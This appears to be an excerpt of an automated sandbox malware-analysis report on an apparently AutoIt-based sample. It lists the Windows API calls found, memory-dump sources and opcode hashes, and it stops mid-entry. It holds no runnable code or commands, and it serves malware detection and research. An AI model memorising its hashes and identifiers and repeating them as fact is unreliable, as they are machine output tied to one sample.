                        APIs
                        • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                        • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                        • GetCurrentThreadId.KERNEL32(00000000), ref: 004389DA
                        • AttachThreadInput.USER32(00000000), ref: 004389E1
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                        • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                        • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                        • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                        • CloseHandle.KERNEL32(?), ref: 004390EB
                        • CloseHandle.KERNEL32 ref: 004390F0
                          • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                          • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000), ref: 00438FC8
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                        • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                        • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                        • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                        APIs
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                          • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                        • __getptd_noexit.LIBCMT ref: 00414080
                        • __freeptd.LIBCMT ref: 0041408A
                        • ExitThread.KERNEL32 ref: 00414093
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                        • String ID:
                        • API String ID: 3182216644-0
                        • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                        • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                        • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                        • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: BuffCharLower
                        • String ID: $8'I
                        • API String ID: 2358735015-3608026889
                        • Opcode ID: 6283da0382942cdf179c2defd90104cfb3bb41bca83c8823c3d3809723584f1e
                        • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                        • Opcode Fuzzy Hash: 6283da0382942cdf179c2defd90104cfb3bb41bca83c8823c3d3809723584f1e
                        • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                        APIs
                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                          • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                        • String ID: AutoIt3GUI$Container
                        • API String ID: 3380330463-3941886329
                        • Opcode ID: 031cbee35206a8445208c2b512d30020b761577131fe68926333f9eb27ef2b8d
                        • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                        • Opcode Fuzzy Hash: 031cbee35206a8445208c2b512d30020b761577131fe68926333f9eb27ef2b8d
                        • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                        APIs
                        • _wcslen.LIBCMT ref: 00409A61
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                        • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                        • String ID: 0vH
                        • API String ID: 1143807570-3662162768
                        • Opcode ID: 079d7852f2c2e122a1c6d3ae49c00c0e393ae1926005880b18dbaf07f186dfef
                        • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                        • Opcode Fuzzy Hash: 079d7852f2c2e122a1c6d3ae49c00c0e393ae1926005880b18dbaf07f186dfef
                        • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID: HH$HH
                        • API String ID: 0-1787419579
                        • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                        • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                        • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                        • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        • Opcode ID: 67eb88d6a00de776f23b4557e32ab4db8f15d1177ab34bd104c850bd8d7e5bd6
                        • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                        • Opcode Fuzzy Hash: 67eb88d6a00de776f23b4557e32ab4db8f15d1177ab34bd104c850bd8d7e5bd6
                        • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                        APIs
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: '
                        • API String ID: 3850602802-1997036262
                        • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                        • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                        • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                        • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                        • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                        • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                        • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                        APIs
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                        • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                        • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                        • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                        APIs
                        • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,00000001,?), ref: 004515DA
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                        • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                        • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                        • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 00474833
                        • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                        • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                        • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                        • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: htonsinet_addr
                        • String ID: 255.255.255.255
                        • API String ID: 3832099526-2422070025
                        • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                        • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                        • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                        • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                        APIs
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 455545452-1403004172
                        • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                        • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                        • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                        • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: <local>
                        • API String ID: 2038078732-4266983199
                        • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                        • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                        • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                        • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                        APIs
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 455545452-1403004172
                        • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                        • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                        • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                        • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                        APIs
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 455545452-1403004172
                        • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                        • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                        • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                        • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _strncmp
                        • String ID: ,$UTF8)
                        • API String ID: 909875538-2632631837
                        • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                        • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                        • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                        • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
